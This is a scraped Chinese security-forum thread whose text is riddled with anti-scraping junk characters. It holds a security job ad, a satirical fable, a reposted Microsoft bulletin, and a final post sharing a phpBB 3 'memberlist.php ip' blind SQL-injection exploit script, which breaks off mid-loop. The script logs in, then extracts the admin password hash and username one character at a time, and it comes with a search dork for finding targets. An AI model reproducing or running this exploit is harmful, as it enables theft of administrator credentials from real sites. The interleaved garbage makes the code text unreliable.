Board logo

标题: [人才招聘] [招聘] 绿盟科技(杭州办事处)招聘WEB安全测试/安全研究工程师 [打印本页]

作者: webmaster    时间: 2012-5-10 17:17     标题: 绿盟科技(杭州办事处)招聘WEB安全测试/安全研究工程师

招聘职位:WEB安全测试/安全研究攻城师5 w9 t! ~" H# d. p2 o
人数:4人3 `- S6 K/ O) @6 ]
工作地点:杭州
- x. I% T0 A/ D4 ]. d7 P截止日期:2012年8月30日: v- g& w5 P7 t8 I( p" s/ M
学历要求:本科或以上均可
: h) H! I  L- t' j# |% \9 |岗位要求:7 f; l& t0 Z: u0 `9 w
1. 熟悉ASP/.NET/java/php等常见web代码;5 r0 ?2 b# @6 n& e# U
2. 精通或熟悉掌握php/perl/python/javascript/shell等一种或多种脚本语言;" a. \& f0 B- X+ v& w
3. 熟悉主流的Web安全技术,包括SQL注入,XSS,CSRF等安全风险;
5 C% ]3 J* O3 L* {, o8 i* h$ V; k4. 熟悉国内外主流WEB安全产品、工具,如:APPScan、Inspect、wvs等Web扫描工具;: A4 @. [5 B5 V8 e5 g: I
5. 2年以上web安全工作经验,对web安全测试有自己的理解;" z$ A$ s; b, k- N6 F* C2 k
6. 熟悉常见攻击和防御办法,熟悉web安全和渗透技术,能自行进行web渗透测试,WEB代码漏洞挖掘和分析。, Y! M% G0 \4 }
具备以下相关条件者将优先考虑:5 f/ @6 ]( S3 G; h3 P2 G7 \2 m% A
1.熟悉涉密信息系统以及相关技术要求;
& T! A. x" l8 z' e2.熟悉防病毒、防火墙、VPN、入侵检测、漏洞扫描等信息安全系统工作原理及主流产品;
. }5 X& W' u2 i( c. q2 n9 b  s' P3.熟练使用Linux操作系统,了解内核安全机制;7 a. y: }5 t  p' K
4.有内网渗透经验,擅于独立挖掘web安全漏洞;" S# S! w: C  q6 y7 D6 ?
5.对等级保护标准、评估流程等非常熟悉的优先;" h. Q1 H% v, y! r, X7 S3 l) c
6.对cisco、ids、ips等有一定 研究;0 B. H- F% X9 ~6 c, h
7.一年以上信息安全工作经验;/ g7 K5 ~% z4 `0 L5 F, i
8.具有网络、系统安全方面证书。+ P. R/ k* k& I& U% C
9.有一定的软件编程经验和逆向分析经验优先;) h4 A& b% {+ E5 F7 J9 z3 b6 w
有兴趣请发简历到wangtuo@nsfocus.com
作者: lovpuyu    时间: 2019-6-1 23:55

河蟹、蜘蛛和蜗牛的故事
  河蟹:你这网备案了吗?  蜘蛛:啥,我织个网还要备案啊?  河蟹:当然要备案了,将来要是出个啥事,也能查到这是谁的网啊!  蜘蛛:……  河蟹:赶紧停下去备案,没有备案你的网就不能织,织好我也得给你剪断。  河蟹晃了晃他的两个大钳子,蜘蛛慌了神,赶紧屁颠屁颠跑去备案。蜘蛛还是第一次去这个部门,他发现该部门是一群蜗牛在负责。  好多天过去了,蜘蛛的备案还没拿到,去蜗牛那里问了好几次,都说正在处理。蜘蛛太饿了,于是偷偷织好了自己的网。  有一天早上起来,蜘蛛伸了个懒腰,去吃早餐,结果发现自己的网不见了。邻居们告诉他,河蟹二话不说,直接就把网给剪了。  蜘蛛很生气,真想找河蟹去拼命,可是想想河蟹的大钳子,还是作罢了。  好心的草泥马偷偷告诉蜘蛛,墙外边织网是不需要备案的。蜘蛛很高兴,虽然墙很高很高,他还是努力爬了过去。果然,墙外风和日丽,景色无限,重要的是没有可恶的河蟹来烦人。  可是时间长了,蜘蛛又开始有点怀念了,墙里面有些虫子美味又弱智,想起来就流口水。可惜这墙太高了,这些弱智的虫子不知道怎么飞出来。  于是蜘蛛翻过墙回来,果然不出他所料,蜗牛们已经审议通过了他的备案。蜘蛛迅速在老地方织了一张新网,墙内的虫子们真是又傻又美味啊!  有一天中午,蜘蛛突然感觉到他的网剧烈颤动,睁眼一看,一对正在xxoo的苍蝇不小心撞到了网上。蜘蛛已经吃饱了,正好正午骄阳似火烤得受不了,他笑着骂了一声“傻X”,就躲回洞里睡午觉去了。  迷糊中突然听见有人喊,蜘蛛揉着眼出来一看,原来是河蟹。  河蟹在下面指着那一对苍蝇,歇斯底里地朝他嚷:“你看看,你看看!多低俗!多色情!你有没有社会公德心啊?!你这多损害青少年身心健康你知道吗?”  说完,河蟹挥动自己的钳子,把蜘蛛的网剪了个粉碎。  蜘蛛心疼地看着被剪碎的网,心想:“我纳税养着你,你怎么能这么没人性呢。可是他又对河蟹无可奈何,一番思索之后,他和草泥马依依惜别,爬到了墙外。  蜘蛛从此过上了幸福的生活。
( d- k( @0 s! R
人物:樱花浪子 BLOG地址:http://www.hacklu.net/
- l' A  [( F9 X5 v6 }1 R& ^# p8 r

3 b6 _) H# x* W  K
5 l( P! \1 ?5 E0 I; k' D1 D
& w) \3 K4 Y$ z1 q( M
: j0 R: X# P5 G: _  c$ N* ~. ?+ W: |/ T7 n/ \
' U6 U' h$ j0 J/ q: N
& {% J# Y0 n, Z

- u' `7 ]9 Y- E7 A* M
1 m8 ]% i( v+ t- h& ^  H9 o3 h% j5 X3 U7 A- j. C
0 S: v. Y# n- K0 J3 A; W( b7 P: x( h

9 U  g1 Y$ H( ]5 y  W: j
0 O" I$ h- _3 U/ I$ ^% i$ H: o
+ W1 o& C$ p( z) m5 [9 S  _2 [+ S
+ P, a9 I. `: V+ J$ r
: I1 k1 g7 f1 e2 K: W* v
2 s( m) i. }. \0 {9 Q! k# C: P& Q; L! U) T
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: xin0000    时间: 2019-6-18 23:01

已经证明:此贴有意思,而且非常有意思~  
% \' m' i% p# P( k+ f' q) E
, |' U; K3 {) I8 J, p, C6 H2 l, R, C$ n9 `4 T

5 o7 q) W0 i3 e  }0 s/ s5 I7 q0 c1 J/ n+ l5 r

$ p! c( S& {; I4 w  x! A' I5 p" q

6 v2 I  k% C9 v9 d6 ^
9 G" N; C+ a: D/ A1 e2 V
; K' ]3 T3 y3 {. r6 d" m: A% {
1 u# [7 d8 t. R& h7 q/ `! i! c- e6 p! W9 v6 c
2 X3 h0 B( B0 `/ P9 K

' o- P) j5 l0 ^# k
9 l* |( Y) Z' p8 u$ p* _: y6 H% E6 `, g, [* e9 R
! e# q5 }( b  k; c. ^5 L9 d

, x  u! e, h7 U) e& H5 U" b9 G9 k( d- J, X& ^4 ~( |0 h5 L
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: aga    时间: 2019-7-20 23:01

MS07-061:Windows URI处理中的远程执行代码漏洞
发布日期: 十一月 13, 2007版本: 1.0

9 C0 R2 n* j* g' J! O5 N) `# ?' y6 G
摘要
& t/ l+ y/ v2 q  Q4 ?8 Q3 K( l
此更新可消除一个公开报告的漏洞。 Windows Shell 处理传递给它的特制 URI 的方式中存在一个远程执行代码漏洞。 如果 Windows Shell 没有充分验证这些 URI,则攻击者可能利用此漏洞并执行任意代码。 Microsoft 仅识别了在使用 Internet Explorer 7 的系统上利用此漏洞的方式。但是,Windows XP 和 Windows Server 2003 的所有受支持版本中包括的 Windows 文件 Shell32.dll 中存在该漏洞。
7 w8 _1 Y, x" V5 ]
建议。 Microsoft 建议用户立即应用此更新。

, r7 H* h# ]2 H- b  I+ @
受影响的软件

- X( S' w0 w7 P  A+ c, l
操作系统 最大安全影响 综合严重程度等级 此更新替代的公告 Windows XP Service Pack 2 远程执行代码 严重 MS06-045 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 x64 Edition 和 Windows 2003 Server x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) 远程执行代码 严重 MS06-045
7 M, Q# E6 r" T! L% p3 @
不受影响的软件
8 p; Q# t1 K! p" @1 d6 P
操作系统 Microsoft Windows 2000 Service Pack 4 Windows Vista  Windows Vista x64
" b! |7 m, D; P9 X. P
微软的安全公告:

4 R3 B0 U' B4 v" ]$ b+ d! h7 `  w
http://www.microsoft.com/china/technet/security/bulletin/MS07-061.mspx

8 S8 r+ p! M" u5 n; t
(以上链接均连到第三方网站)
9 u6 }  h4 d! K) R) {
" c8 l- \6 Y/ O6 v! i. K

1 ]$ L/ ]" K2 B7 c: L. p8 `
) M# ~' i+ {7 a% R7 B1 ^/ ?, H6 i2 Y  x1 F
! {. b6 {% K. e+ D: H

5 j5 Q3 V3 g5 I& y# T4 ?
8 k( V3 o! J- e4 K$ t9 o
2 E; S+ J3 T# H6 R& n: H2 B' ?2 y. d, O
9 ]: [  y3 u1 u- D5 i
' M, t1 q- @( S0 q5 r" s3 U) W
9 i$ H( D" e; o0 e2 h

% |* I- N- G$ a, T' ~' u! o1 j' R

* w/ l" i9 j* h- F' e5 M) u
2 A" F- N: \9 m$ {, L; Y# ]# |$ Q7 Y( v
" V% c. O, r, H8 T$ i, H/ `5 [
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: hushui8878    时间: 4 天前 23:55

PHPBB 3.0 0day漏洞放出
#!/usr/bin/php -q -d short_open_tag=on
* @4 ?# T# \+ M* r1 Y. v- O/ a<?
) Z+ e1 T! ~7 C# {echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure% d+ n/ j) `1 S; }6 U
";
5 t* y' Q9 b/ {- b' U  becho "by Hackerz5 hackerz5x@yahoo.com
. U9 j( H" E- i" b";
" \0 D( G8 ]" jecho "site: http://hackerz5.com
: h& n# ~1 T1 c) M"; 9 J$ m1 E( k, V& L
echo "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"
* s( }1 N5 Q$ h
$ h/ D! y2 L, ]7 Z$ _7 G; B$ W; s"; 0 Q9 P: ^  E9 |/ E6 [8 _
/* : u9 E( q6 M0 c9 e! c; A
works regardless of php.ini settings 6 R2 s4 g. x* B( [3 C
you need a global moderator account with "simple moderator" role
! S9 q4 K1 }& H*/
) Z/ ]: |6 Q! h; [/ xif ($argc<5) { 7 O0 o. v. ?$ d: P0 m$ C
echo "Usage: php ".$argv[0]." host path user pass OPTIONS
% [2 w3 Y1 F( K: S# k1 q: `; l"; 5 t7 }, V5 t3 Z: h9 l  W- P5 \
echo "host: target server (ip/hostname)$ w4 E# G3 g8 f% t& G  F8 R, n0 w# s
";
9 v/ `, G; O- m! m* }" F8 Pecho "path: path to phpbb3
  U5 t% c' G7 o/ U5 Z";
, F- C  p, n. ]% r+ \% J8 necho "user/pass: u need a valid user account with global moderator rights
. ]# U* w; |( s) e/ T( `: ~3 u- F7 @8 U";
- P. V4 M1 \: i$ A3 k# m% ]( T5 ~2 T  |echo "Options:2 i- E3 F) q8 @' g6 [2 z
";
6 I5 _6 ~. p. Y. r5 D# Necho " -T[prefix] specify a table prefix different from default (phpbb_)
% T2 h1 e) r( r2 P/ ~. Y% @"; 1 m( J) h" P! @1 S. h
echo " -p[port]: specify a port other than 80& c/ d( R6 Z9 D, j; ?7 r( `1 O
";
& H7 C# {) |7 u6 |1 Lecho " -P[ip:port]: specify a proxy
6 e# C  R) \0 J"; 5 j- q( ]" R) d: F! C
echo " -u[number]: specify a user id other than 2 (admin); ?# Y; @$ b* S: C! P
"; ' S+ ?8 n" b. ^, e/ r. W! n
echo " -x: disclose table prefix through error messages
& a- L0 C3 @% u"; " ~% y3 p8 j4 o3 P4 S9 I
echo "Example:
6 T, i3 N- T3 I$ O; B) ?) g";
  u( h( g# j6 l7 q! Z+ cecho "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u
- s' d( O9 \" O5 j; Z( g"; / ^; U% {* R) y/ `9 u" ]
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7
& `$ M) V3 j. T* L";
9 Y, P' Y1 x3 f# Tdie;
: E. ^% _1 E8 G; ]+ h}
; Z7 J& u3 q/ _/ |" y/ i" q3 G, Terror_reporting(0); ' r# q6 n% Q  e/ ~- T; A
ini_set("max_execution_time",0);
! I& h8 D5 ~8 d9 L7 Tini_set("default_socket_timeout",5);
- {% ?" `" F" g* l1 N* Bfunction quick_dump($string) " N# ^  R: ~5 o/ l8 `
{
6 f# f' W9 T+ \; f$result='';$exa='';$cont=0; . @: p, k$ f8 Q
for ($i=0; $i<=strlen($string)-1; $i++)
7 c9 V# A0 K) n2 G7 |{
. d+ e& l8 `5 @. Aif ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) 4 W( R) O9 F' z! Q# a
{$result.=" .";}
* m) Q" r' r. Q$ B) X6 v3 S+ U/ a: W1 aelse
1 W# }& B, _; S/ i0 R6 R* Y{$result.=" ".$string[$i];} ) ?7 [- A$ f3 H. u& @
if (strlen(dechex(ord($string[$i])))==2) # _* l* `  x( A5 h" g0 @
{$exa.=" ".dechex(ord($string[$i]));} " y! A$ \- c' \* T* I
else / y' j8 Z5 V$ a- y
{$exa.=" 0".dechex(ord($string[$i]));}
- U- z9 a2 m3 K% Q) H" ]$cont++;if ($cont==15) {$cont=0; $result.="
! P& V4 R& d5 ^# I+ ]"; $exa.=": N3 d- d  r# X# D; A3 x2 x
";}
7 n5 ]9 w% b2 }6 O}
5 F1 @2 ~4 J" y: p' }) c5 l$ Lreturn $exa."* S% H! P0 U) ~: |$ m, j
".$result; " h/ i0 e; f7 C* f. W5 b# G3 n3 |
} 8 V' m  K. h7 w( {6 C1 \" Y, M. x
$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}) '; $ i: s" I9 M% D3 |3 ?) ]
function sendpacketii($packet)
2 z9 D/ L. Q' c{ " o' D  u. y7 @* D3 G
global $proxy, $host, $port, $html, $proxy_regex; ' X1 R/ Z6 V. i' }
if ($proxy=='') {
( ]) x" x' H9 O+ X% p1 L1 a& u& ^$ock=fsockopen(gethostbyname($host),$port);
! I- Z5 M( p: V) Z8 m9 @2 zif (!$ock) { . u. [; O% v7 G: j$ W( H3 I1 N, J
echo 'No response from '.$host.':'.$port; die;
" k( k# ~) ?( I}
2 r  i8 l9 ]( x) B/ E+ b8 y' S' @}
% C' p( v% w2 G) ]# Xelse { ) f2 E9 w9 @7 T& `/ e8 N+ m
$c = preg_match($proxy_regex,$proxy); ' {9 O' B; W+ Q: q* P
if (!$c) {
6 D7 T; K; G- W/ g% Vecho 'Not a valid proxy...';die; 6 w3 X  O+ ?) R: \# V
} : M) H7 A" t7 W* M+ f
$parts=explode(':',$proxy);
8 W+ l: r( R2 X, q3 \1 P) @echo "Connecting to ".$parts[0].":".$parts[1]." proxy...
" P  r' M6 o  w2 _- N( f- B"; ' ?2 d' T6 Y+ i8 `  R4 p, W. [! c
$ock=fsockopen($parts[0],$parts[1]); 6 K- S4 ]; \* c! b  E
if (!$ock) { ( R0 A5 o  Y) R$ e
echo 'No response from proxy...';die;
$ b; s4 d  @+ e0 x1 v3 u}
* e" W. n8 @9 Q) P) G+ @% a} ( K, Q: Y6 j4 Q  J
fputs($ock,$packet);
3 N1 j* F' }; T1 d( _0 q3 Hif ($proxy=='') { 6 S, r0 _! P( a9 c0 ]
$html='';   x1 k& H0 e0 j
while (!feof($ock)) { ! \. K5 w, b; T# s! l3 V. p
$html.=fgets($ock);
* S! m5 v# O( B} 5 u9 a: Z" m1 j7 ^  t+ O' B
}
0 |0 u. q" w0 a+ I% P7 _! u& Velse {
! L% q; x- e- v3 u0 r$html=''; , r; p1 N5 r& B
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { ; n/ @6 A- k  z, }' @! H
$html.=fread($ock,1); * ]9 P8 L6 T2 \8 n
}
6 ?3 d# u; l, g}
/ c1 @: w# w2 a. p' L. Q. ^fclose($ock); 7 k' w- h, K) Q; M
#debug
2 O2 _9 j& r: j! d#echo "
! b4 K5 N) M4 v; ?+ E% \".$html;
  [' b% @! l/ i7 ]$ e  A; c* Z+ [}
; r! F( L. p4 M$ v$host=$argv[1]; ! j- x2 k% S" i- ?
$path=$argv[2];
; p: E) z; {: |  z: z$ M5 Y$user=$argv[3]; ; w$ r, K9 c0 k" ~7 d' n% ?2 u# @" c
$pass=$argv[4];
3 T& a8 g5 u2 K$port=80; % X2 ~6 q2 _( {) F; I5 J. d
$prefix="PHPBB_"; , u/ O2 i% ]0 a
$user_id="2";//admin
  `0 T* G/ n1 H: Y$discl=0; 2 Z- [+ V& @' k+ a' g) E8 X+ m
$proxy="";
  ^' I8 q1 a5 T+ @# Bfor ($i=3; $i<=$argc-1; $i++){
' D4 ~8 z, p7 L/ R  f& Z7 e' ^$temp=$argv[$i][0].$argv[$i][1];
' S9 A7 @% v- u& yif ($temp=="-p")
8 S6 G1 P! C: C$ v{
- {+ ^% d! U, q! |* ?$port=str_replace("-p","",$argv[$i]);
5 ]2 w3 I4 R: n3 J! ~$ H} ' m7 d& ^: h& ~& d0 J! r# K: h: {: [
if ($temp=="-P") & P& k, D9 |- |$ R5 r
{ # u3 B- x0 c% x' ?* F' @
$proxy=str_replace("-P","",$argv[$i]);
0 t) {) h  Q1 Y* j' D0 U- j}
0 e0 c2 F" p* ~8 Eif ($temp=="-T") 1 w& s& M5 f3 l" D
{ ( `0 E, Y/ R" ^' `) A
$prefix=str_replace("-T","",$argv[$i]);
9 N( |/ n# B/ J/ F7 J7 M} - ^' x( \1 h6 d+ V
if ($temp=="-u") * `. T7 D: g1 |
{
" X5 b+ K% R! T$user_id=str_replace("-u","",$argv[$i]);
5 x; D) l/ u. U% u" O% q} 0 y8 U* {3 ]/ r5 E
if ($temp=="-x")
( i# r' l- `# a* ^{
) R' f( }  y- P. N$discl=1;
' z0 M5 J9 e7 D7 W# u! X7 [$ v}   Y' V, f. Z6 i& @# k
} 5 U# d5 V' U- R; o* {1 i: G: D# m' n
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} 9 ~" t! N* \% x5 ]
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} & b  C7 N" w3 {* \. j2 r
$data="username=".urlencode($user);
, B9 M7 @9 l  D( \2 w$ y$data.="&amp;password=".urlencode($pass); ) H, {8 E; L3 D# `" V3 C3 r
$data.="&amp;redirect=index.php"; : q& t6 j2 }$ n
$data.="&amp;login=Login"; 3 R- Y; N! Y& W
$packet="POST ".$p."ucp.php?mode=login HTTP/1.08 {) H: F+ M# ]8 x8 G! |* [3 ?
"; * S" u0 n* A# Q( @" m. k4 l% @% x& S
$packet.="Referer: http://$host$path/ucp.php?mode=login
( G; k( N" s' i0 g9 Y. I, q* ["; * ?  E# o: j/ z& b) H, z1 N9 }4 z
$packet.="Content-Type: application/x-www-form-urlencoded& u* Z8 X8 |/ I
"; 0 t. Q7 v: A3 }- S
$packet.="Accept-Encoding: text/plain3 t- P- w' b/ B. y; d, L9 D! E
";
7 d5 \) e- j$ {$packet.="Host: ".$host.") d- W5 q& s0 \- x. o1 ?
"; / W5 h3 G. ]9 s- R
$packet.="Content-Length: ".strlen($data)."
* g( o* b+ o. h( ^  f# }";
5 V( [4 Z2 U8 J* U' e+ {$packet.="Connection: Close' Q7 }8 O' y4 \2 F7 f( w- a
% ]! v# l; h- ?! I' s, }. h
"; # r' s3 M, ?4 l; ]1 ]* y
$packet.=$data; " X* D- ~0 j7 Z0 Y* l
sendpacketii($packet); ! L$ L) e5 N1 e0 P1 \4 d  Q# \0 F
$cookie="";
1 p: ^4 k* {* [$ d3 K$temp=explode("Set-Cookie: ",$html); 0 @4 y# @$ G1 ~- R
for ($i=1; $i<=count($temp)-1; $i++) 4 C' `3 S, o" i) ~3 d
{ 2 y# N/ X' C2 ~
$temp2=explode(" ",$temp[$i]);
" X; I" j. e9 z( S* H7 ?$cookie.=" ".$temp2[0];
4 n& Y. D5 T5 c}
' M+ P/ s% B5 a. h* }8 W3 j3 bif (eregi("_u=1;",$cookie))
: Z3 f( v6 j4 f4 ?9 ]9 i{ 2 q7 K, V7 p! N: o
//echo $html."
' v; i% P7 A& P' c- P: k. {' q";//debug ) t2 G! s: ?% S) c
//die("Unable to login...");
3 x# R, A- O5 b) t% B. ]7 ^4 r) K4 x} 7 Q0 ?, _% ~/ S5 }4 C) n
echo "cookie -> ".$cookie."
2 G  j* A- r" `3 q- R. Z";
6 q' m' U) h/ X1 U1 v/ H5 v* [if ($discl)
- j6 n3 \5 _# i9 k4 y4 ~9 y{ & Y2 j  ]- y; q- M
$sql="'suntzuuuuu"; 4 s' R# v6 ~' U( A" m, n
echo "sql -> ".$sql."% A& u% A: U4 j- D3 T6 C' K2 h# w
";
  o$ k' W& T3 m% G. C' O- B4 v3 r& s7 f$sql=urlencode(strtoupper($sql)); 8 n7 u! O/ j0 A3 p( w& q2 O+ \
$data="username=";
1 P- U* D6 e# ]+ r  d6 H$data.="&amp;icq="; ( a2 y' j( A3 H2 \+ d
$data.="&amp;email=";
8 ?2 A6 v4 O8 ?% r, \1 V+ B% e$data.="&amp;aim="; ' `8 ]1 G: ?+ |
$data.="&amp;joined_select=lt";
7 L+ ]' d2 k6 x$data.="&amp;joined="; ; u0 a7 Y5 F5 t/ A- ^/ |
$data.="&amp;yahoo=";
# T% k) j* w0 Y# X- J6 D6 G$data.="&amp;active_select=lt"; 0 W! b0 B- [/ i0 Q4 l$ @) d* q
$data.="&amp;active="; : }- ~8 l2 i3 b
$data.="&amp;msn="; $ h3 s5 X" |1 `" f& x" C5 }
$data.="&amp;count_select=eq"; . p0 L2 t9 P% e! T& p7 j/ S" z$ M6 B
$data.="&amp;count=";
6 y. \* \: f. i5 P% Y$data.="&amp;jabber=";
! U3 G3 r: _$ P! h$data.="&amp;sk=c";
. a* k6 W" d# G* [& }8 ^1 B$data.="&amp;sd=a";
2 b* L: _. s; x$ R+ D8 m$data.="&amp;ip=".$sql;
& {; @, F; c5 r/ I8 K% v$data.="&amp;search_group_id=0";
9 I$ |" I& A* w( T- F( Q. k$data.="&amp;submit=Search"; ' m! E! h" {4 p& s
$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
& v6 J& c* A; }0 w";
( A* A- h/ t, V2 p$ F2 R* J  ~* ?0 ^$packet.="Content-Type: application/x-www-form-urlencoded
/ ]' j( ~3 v3 y, ?";
  j  d' g: ~! C, I; [: k1 [$packet.="Host: ".$host."7 h: ?+ A8 ?- x" B( A0 n. U
";
2 e- S% ^1 w6 B$packet.="Content-Length: ".strlen($data)."8 n6 c8 \# X* Z
"; % y# s/ B2 `% _& M
$packet.="Connection: Close
4 y1 u- N9 s3 C' U( Q+ ]";
8 Y1 X3 K9 H$ P; w$packet.="Cookie: ".$cookie."
, X% X8 b# t$ }/ \% l
/ K3 r" V  x) y' K" Q* L0 V/ {";
' u# Q/ O$ @' G# X$packet.=$data;
8 e1 M- G& ], c1 J5 }sendpacketii($packet); ' r! R! A5 [& [
if (strstr($html,"You have an error in your SQL syntax"))   H7 j2 W3 l0 ]
{ . a  r* K9 h" b' Q) v" X+ ]1 L* K
$temp=explode("posts",$html);
$ ~" t9 C6 t1 j% h+ B$temp2=explode(" ",$temp[0]);
' Q5 p1 f+ ]- C1 y) ?) ~; w4 _$prefix=strtoupper($temp2[count($temp2)-1]);
, W4 O; g2 W" T; j/ s1 h4 decho "prefix -> ".$prefix."
: l) `; f7 j: Q3 a/ G! h";sleep(2);
0 z2 s' s; i. E4 D* q5 o& Y! a( I} 2 G6 h) _: V$ Z, k! ~; a
}
) O% ~8 j' C' R4 c$md5s[0]=0;//null 5 e. Y! o7 V( F( U/ E/ \
$md5s=array_merge($md5s,range(48,57)); //numbers
3 h& e/ s2 |. r8 \$md5s=array_merge($md5s,range(97,102));//a-f letters & U6 T& \4 V9 ~8 U( |! c
//print_r(array_values($md5s));
1 L; [: n8 ?  n$j=1;$password="";
2 p* W/ W6 u4 uwhile (!strstr($password,chr(0)))
$ @4 L* q/ j. Z' A' U+ S{
7 J$ ^5 J: Y) ?' D8 L1 \for ($i=0; $i<=255; $i++) , _' _2 `: _: a0 o% G1 H1 v) G
{
6 t1 B# w, X6 W$ }# Lif (in_array($i,$md5s))
1 V) T8 W7 e& H' y& n{
, q( I" J9 ?5 ?0 Z7 i* q  ~1 X( }$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
$ Q* b9 |$ j/ E3 C. e% recho "sql -> ".$sql."+ |$ ]- w- d  x. G
"; " ^- F1 F& V% z6 g! E0 ^
$sql=urlencode(strtoupper($sql));
7 z2 |5 G# k/ n2 m) W* L" z1 j$data="username="; ! r! I/ ]8 L3 O, }* s
$data.="&amp;icq=";
  w0 d7 C" p! c5 Y0 x8 f1 S. _: a$data.="&amp;email=";
! v' ~5 h! S( C* H+ J1 L7 G$ r$data.="&amp;aim=";
& W4 d) K' ^  c4 {$data.="&amp;joined_select=lt";
) v. C7 O2 u, l- G8 m/ G" d$data.="&amp;joined=";
( u/ ~  E, M4 K$ e% J2 W1 w' }/ m, l$data.="&amp;yahoo=";
" }+ n* ]# |) [/ \8 I% {' _& A$data.="&amp;active_select=lt";
7 L- d% B# z; g3 k$data.="&amp;active=";
, q# m# C9 y- e0 j( z0 C4 r4 V$data.="&amp;msn=";
8 z. L9 Z/ q3 X4 j3 c# c$data.="&amp;count_select=eq";
! ~/ E5 R% \# q, ]! i0 m$data.="&amp;count="; & U. m3 ?1 o. l( b9 R
$data.="&amp;jabber=";
$ c, ^6 d2 ~" [) \# F$ o+ ^' v. A% z$data.="&amp;sk=c"; 7 e% I2 a3 M$ A  u" A# v! L
$data.="&amp;sd=a";
0 S2 G8 ?0 C+ c' P: ]" `% \/ G* z% z$data.="&amp;ip=".$sql;
4 @0 R$ v5 E" w0 ?  r& |9 ~. Z8 w/ _$data.="&amp;search_group_id=0"; 3 G1 p; I. S+ y  L
$data.="&amp;submit=Search";
# c0 l. b$ r8 \2 c. t4 P9 ^, p2 v$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
; A. I; \; u' x  A* j9 Z8 k7 k"; * |' G% l3 |- P
$packet.="Content-Type: application/x-www-form-urlencoded9 f* G: ~! T0 q! K1 G8 W' U
"; / r  C; v$ w* ^# b( [6 i: ^
$packet.="Host: ".$host."2 z( I. x7 Y  F+ O7 Q7 q" H' z
";
5 Y1 }4 J3 W! p6 k& h# K  p' B$packet.="Content-Length: ".strlen($data).") B2 q/ R  h$ H
";
$ c& B6 b5 b9 [3 |* I$ E$packet.="Connection: Close7 u8 p" [' B% W5 _6 G$ T
";
/ }1 P. ~% q! f0 c2 t$packet.="Cookie: ".$cookie." " Z7 O0 ?4 K# X7 v/ s6 N- W

) @+ m! R+ R* E: e"; . b/ A: Q" p5 B" l
$packet.=$data; . A. ^1 d  O7 ~( n" E9 l
sendpacketii($packet); 0 {1 i4 ?" X$ {- U! B# R9 g% T
if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]
, H$ T) Q% `5 Q, F7 n9 c+ {";sleep(2);break;} " j0 e0 F% w: c5 q, E# @
} ; l8 T3 \( A6 l$ b7 x8 M# {
if ($i==255) {die("Exploit failed...");}
4 y  @9 c* G+ g: \& m2 {3 u$ F! J* a} 8 V7 N+ H8 `  d6 C
$j++; * S) X2 r6 L. v( Z# A$ z* P
} 5 c9 ]4 H9 L0 _- W" n
$j=1;$admin="";
0 j8 q- L+ N# V' L0 g& {) i4 i3 ]while (!strstr($admin,chr(0)))
, {+ n6 K0 w$ u; j9 Z. j6 a{ ( c  A+ ^$ C; d8 r
for ($i=0; $i<=255; $i++) ' p$ o0 {/ E' q1 Q8 U' N
{ 8 [, y; ^; `. X6 U
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; / `/ t+ \5 B: C, P; G! T
echo "sql -> ".$sql.", {1 F! C* P- Y! M( R3 K. e/ ~
"; . T; c( c) Q& N9 q
$sql=urlencode(strtoupper($sql));
$ S$ q8 D' x' C$ I$data="username=";
5 p" `3 |% b% p  A2 f7 p$data.="&amp;icq=";
6 K/ X) w9 n9 w# g! R$data.="&amp;email=";
& i# W4 j5 Z4 Z7 @$data.="&amp;aim=";
' X5 f( u. Q8 ]1 P/ p$data.="&amp;joined_select=lt";
0 C' g4 x5 U, \- K$data.="&amp;joined=";
4 K/ |" S0 M1 `5 I( n  b$data.="&amp;yahoo=";
' L! r% ?$ R" q7 p; |4 d$data.="&amp;active_select=lt"; # m7 @& X6 H" v) {
$data.="&amp;active=";
1 y( Z" \5 p% E' W$data.="&amp;msn="; ! K( F' B# f% z9 {$ c# t( |9 V% b
$data.="&amp;count_select=eq"; : G6 o5 f/ L) e( ?6 U' h
$data.="&amp;count="; $ |% y$ c: y: ?$ b
$data.="&amp;jabber=";
4 q2 i! {" X; L5 \3 l! H/ u$data.="&amp;sk=c"; $ l  W' k9 y2 @  p. E$ s9 Y
$data.="&amp;sd=a";
' [, z" \5 ]' `4 q6 d$data.="&amp;ip=".$sql; 5 R2 x) j4 T% Q2 f
$data.="&amp;search_group_id=0";
